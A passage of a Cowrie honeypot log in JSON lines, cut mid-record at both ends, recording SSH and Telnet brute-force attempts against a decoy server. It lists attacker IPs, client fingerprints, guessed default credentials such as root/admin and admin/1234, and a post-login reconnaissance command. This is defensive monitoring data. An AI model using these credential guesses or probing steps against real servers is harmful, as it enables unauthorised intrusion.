-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:47:28.947747Z","src_ip":"194.233.79.134","session":"22105c617b92"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T00:47:29.986010Z","src_ip":"194.233.79.134","session":"22105c617b92"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:47:31.513915Z","src_ip":"194.233.79.134","session":"22105c617b92"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:47:34.474361Z","src_ip":"212.227.125.160","session":"22c2021d02b0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:47:41.745252Z","src_ip":"212.227.235.229","session":"db18ea76ca93"}
{"eventid":"cowrie.session.closed","duration":180.30696177482605,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:47:41.749676Z","src_ip":"212.227.235.229","session":"db18ea76ca93"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T00:47:42.199411Z","src_ip":"212.227.125.160","session":"22c2021d02b0"}
{"eventid":"cowrie.session.closed","duration":"26.1","message":"Connection lost after 26.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:47:46.502124Z","src_ip":"212.227.125.160","session":"22c2021d02b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58426,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cac389e7d4d","protocol":"ssh","message":"New connection: 212.227.235.229:58426 (1.2.3.4:22) [session: 4cac389e7d4d]","sensor":"my-vps","timestamp":"2025-08-28T00:47:52.076663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:47:52.077633Z","src_ip":"212.227.235.229","session":"4cac389e7d4d"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:47:52.181542Z","src_ip":"212.227.235.229","session":"4cac389e7d4d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12","message":"login attempt [admin/12] failed","sensor":"my-vps","timestamp":"2025-08-28T00:47:52.505365Z","src_ip":"212.227.235.229","session":"4cac389e7d4d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:47:53.611452Z","src_ip":"212.227.235.229","session":"4cac389e7d4d"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":54270,"dst_ip":"1.2.3.4","dst_port":22,"session":"21f3d5e62b74","protocol":"ssh","message":"New connection: 139.19.117.131:54270 (1.2.3.4:22) [session: 21f3d5e62b74]","sensor":"my-vps","timestamp":"2025-08-28T00:48:03.876553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:48:03.877446Z","src_ip":"139.19.117.131","session":"21f3d5e62b74"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T00:48:03.894106Z","src_ip":"139.19.117.131","session":"21f3d5e62b74"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"f4:44:5b:be:ca:2b:fd:c3:3f:85:42:4e:bb:8b:15:00","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzipneaMaDvHQjiiaJyMiZUZ3SBZgRKZyroEKOkRaZPcYYucASBL++SYbZMdEtFMcK0vD6fCsc1aFOozwsYBBJiIBe+Rjqj/W02idf9miErGCg5z8AEVeOxyUitwOYbltzW6qYPRptzK+CJyfPtPDqmQxAGcnSF2f/vfFI90Sm0KXXtnVeVYkF60kO0G0CNQPF3WlqcKAiozaqalQr/7P0DIR54hEeX0TEPGXpHXivuPwsyJtMtZ90s+zzeXB5J8XkqB+XUZM+3Npf3qnfkBBBhQzMjG04lmTNANqFQYP+iuXoKSUcj4HV3O8TevXGPm/kFDHJS8iDBIPulsoqOiU/","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint f4:44:5b:be:ca:2b:fd:c3:3f:85:42:4e:bb:8b:15:00","sensor":"my-vps","timestamp":"2025-08-28T00:48:03.929504Z","src_ip":"139.19.117.131","session":"21f3d5e62b74"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"f4:44:5b:be:ca:2b:fd:c3:3f:85:42:4e:bb:8b:15:00","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzipneaMaDvHQjiiaJyMiZUZ3SBZgRKZyroEKOkRaZPcYYucASBL++SYbZMdEtFMcK0vD6fCsc1aFOozwsYBBJiIBe+Rjqj/W02idf9miErGCg5z8AEVeOxyUitwOYbltzW6qYPRptzK+CJyfPtPDqmQxAGcnSF2f/vfFI90Sm0KXXtnVeVYkF60kO0G0CNQPF3WlqcKAiozaqalQr/7P0DIR54hEeX0TEPGXpHXivuPwsyJtMtZ90s+zzeXB5J8XkqB+XUZM+3Npf3qnfkBBBhQzMjG04lmTNANqFQYP+iuXoKSUcj4HV3O8TevXGPm/kFDHJS8iDBIPulsoqOiU/","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T00:48:03.930101Z","src_ip":"139.19.117.131","session":"21f3d5e62b74"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"f4:44:5b:be:ca:2b:fd:c3:3f:85:42:4e:bb:8b:15:00","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzipneaMaDvHQjiiaJyMiZUZ3SBZgRKZyroEKOkRaZPcYYucASBL++SYbZMdEtFMcK0vD6fCsc1aFOozwsYBBJiIBe+Rjqj/W02idf9miErGCg5z8AEVeOxyUitwOYbltzW6qYPRptzK+CJyfPtPDqmQxAGcnSF2f/vfFI90Sm0KXXtnVeVYkF60kO0G0CNQPF3WlqcKAiozaqalQr/7P0DIR54hEeX0TEPGXpHXivuPwsyJtMtZ90s+zzeXB5J8XkqB+XUZM+3Npf3qnfkBBBhQzMjG04lmTNANqFQYP+iuXoKSUcj4HV3O8TevXGPm/kFDHJS8iDBIPulsoqOiU/","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint f4:44:5b:be:ca:2b:fd:c3:3f:85:42:4e:bb:8b:15:00","sensor":"my-vps","timestamp":"2025-08-28T00:48:03.947656Z","src_ip":"139.19.117.131","session":"21f3d5e62b74"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"f4:44:5b:be:ca:2b:fd:c3:3f:85:42:4e:bb:8b:15:00","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzipneaMaDvHQjiiaJyMiZUZ3SBZgRKZyroEKOkRaZPcYYucASBL++SYbZMdEtFMcK0vD6fCsc1aFOozwsYBBJiIBe+Rjqj/W02idf9miErGCg5z8AEVeOxyUitwOYbltzW6qYPRptzK+CJyfPtPDqmQxAGcnSF2f/vfFI90Sm0KXXtnVeVYkF60kO0G0CNQPF3WlqcKAiozaqalQr/7P0DIR54hEeX0TEPGXpHXivuPwsyJtMtZ90s+zzeXB5J8XkqB+XUZM+3Npf3qnfkBBBhQzMjG04lmTNANqFQYP+iuXoKSUcj4HV3O8TevXGPm/kFDHJS8iDBIPulsoqOiU/","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T00:48:03.948371Z","src_ip":"139.19.117.131","session":"21f3d5e62b74"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":42988,"dst_ip":"1.2.3.4","dst_port":22,"session":"031fd62f6938","protocol":"ssh","message":"New connection: 171.243.151.203:42988 (1.2.3.4:22) [session: 031fd62f6938]","sensor":"my-vps","timestamp":"2025-08-28T00:48:09.795414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:48:09.799155Z","src_ip":"171.243.151.203","session":"031fd62f6938"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:48:09.998774Z","src_ip":"171.243.151.203","session":"031fd62f6938"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:48:13.876756Z","src_ip":"139.19.117.131","session":"21f3d5e62b74"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T00:48:15.468105Z","src_ip":"171.243.151.203","session":"031fd62f6938"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:48:16.696756Z","src_ip":"171.243.151.203","session":"031fd62f6938"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":34300,"dst_ip":"1.2.3.4","dst_port":23,"session":"1a1e9e1d5dc5","protocol":"telnet","message":"New connection: 176.65.149.186:34300 (1.2.3.4:23) [session: 1a1e9e1d5dc5]","sensor":"my-vps","timestamp":"2025-08-28T00:48:36.852645Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:48:36.894388Z","src_ip":"176.65.149.186","session":"1a1e9e1d5dc5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T00:48:36.915312Z","src_ip":"176.65.149.186","session":"1a1e9e1d5dc5"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T00:48:36.916792Z","src_ip":"176.65.149.186","session":"1a1e9e1d5dc5"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T00:48:36.918225Z","src_ip":"176.65.149.186","session":"1a1e9e1d5dc5"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":33710,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d5b5808cc69","protocol":"ssh","message":"New connection: 194.233.79.134:33710 (1.2.3.4:22) [session: 5d5b5808cc69]","sensor":"my-vps","timestamp":"2025-08-28T00:49:09.359772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:49:09.441722Z","src_ip":"194.233.79.134","session":"5d5b5808cc69"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:49:09.908084Z","src_ip":"194.233.79.134","session":"5d5b5808cc69"}
{"eventid":"cowrie.login.success","username":"root","password":"4e2q1w3r","message":"login attempt [root/4e2q1w3r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:49:11.802479Z","src_ip":"194.233.79.134","session":"5d5b5808cc69"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T00:49:13.008424Z","src_ip":"194.233.79.134","session":"5d5b5808cc69"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T00:49:13.009241Z","src_ip":"194.233.79.134","session":"5d5b5808cc69"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:49:13.461616Z","src_ip":"194.233.79.134","session":"5d5b5808cc69"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:49:13.462787Z","src_ip":"194.233.79.134","session":"5d5b5808cc69"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":35576,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f97b35b0901","protocol":"ssh","message":"New connection: 171.243.150.245:35576 (1.2.3.4:22) [session: 4f97b35b0901]","sensor":"my-vps","timestamp":"2025-08-28T00:49:36.821600Z"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":35582,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cdce7f83231","protocol":"ssh","message":"New connection: 171.243.150.245:35582 (1.2.3.4:22) [session: 0cdce7f83231]","sensor":"my-vps","timestamp":"2025-08-28T00:49:37.648171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:49:37.657858Z","src_ip":"171.243.150.245","session":"0cdce7f83231"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-gr